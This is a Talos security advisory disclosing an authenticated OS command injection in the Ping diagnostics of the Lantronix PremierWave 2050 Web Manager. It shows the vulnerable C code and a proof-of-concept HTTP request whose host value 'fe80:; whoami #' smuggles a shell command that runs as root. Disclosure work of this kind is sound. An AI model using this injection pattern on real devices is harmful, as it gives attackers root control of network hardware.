Talos IntelligenceTALOS-2021-1327Lantronix PremierWave 2050 Web Manager Diagnostics: Ping OS command injection vulnerability
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:S/C:C/I:C/A:C
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
EPSS
Percentile
70.2%
Summary
An OS command injection vulnerability exists in the Web Manager Diagnostics: Ping functionality of Lantronix PremierWave 2050 8.9.0.0R4. A specially-crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger this vulnerability.
Tested Versions
Lantronix PremierWave 2050 8.9.0.0R4 (in QEMU)
Product URLs
<https://www.lantronix.com/products/premierwave2050/>
CVSSv3 Score
9.9 - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
CWE
CWE-78 - Improper Neutralization of Special Elements used in an OS Command (βOS Command Injectionβ)
Details
PremierWave 2050 is an embedded Wi-Fi Module manufactured by Lantronix.
The PremierWave 2050 Web Manager provides a network diagnostics interface that allows an unprivileged, authenticated user to verify network connectivity between the PremierWave 2050 and an arbitrary host. The implementation of this feature contains a system call to the ndisc6 application. The underlying command is built using an unsanitized attacker-controlled HTTP parameter, host. The command is executed with root privileges.
If the attacker-supplied host parameter appears to be an IPv6 link-local address (that is, the first five bytes are βfe80:β), and the host does not contain a zone ID (that is, it does not contain a % symbol), then it will be injected directly into the format string used to compose the ndisc6 command.
The relevant portion of the exploitable function is included below.
char* host = get_param_by_name("host");
...
if ( NetLooksLikeAnIPv6Address(host) ) {
if ( !strncmp(host, "fe80:", 5) ) {
if ( !strchr(host, '%') ) {
sprintf((char *)cmd, "ndisc6 -r 1 %s %s | grep Target | awk '{print $1}'", host, InterfaceName);
exec_system_cmd_print((const char *)cmd, (char *)result, 64);
}
}
}
...
An attacker who submits a properly-formed HTTP host parameter can escape the shell command and execute arbitrary OS commands with root privileges.
POST / HTTP/1.1
Host: [IP]:[PORT]
Content-Length: 71
Authorization: Basic YnJvd25pZTpwb2ludHM=
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
ajax=Ping&count=3&timeout=5&submit=Ping&host=fe80:; whoami #
The above HTTP request will result in the execution of the following command with root privileges:
ndisc6 -r 1 fe80:; whoami # eth0 | grep Target | awk '{print $1}'
Timeline
2021-06-14 - Vendor Disclosure
2021-06-15 - Vendor acknowledged
2021-09-01 - Talos granted disclosure extension to 2021-10-15
2021-10-18 - Vendor requested release push to 2nd week of November. Talos confirmed final extension and disclosure date
2021-11-15 - Public Release
Related
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:S/C:C/I:C/A:C
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
EPSS
Percentile
70.2%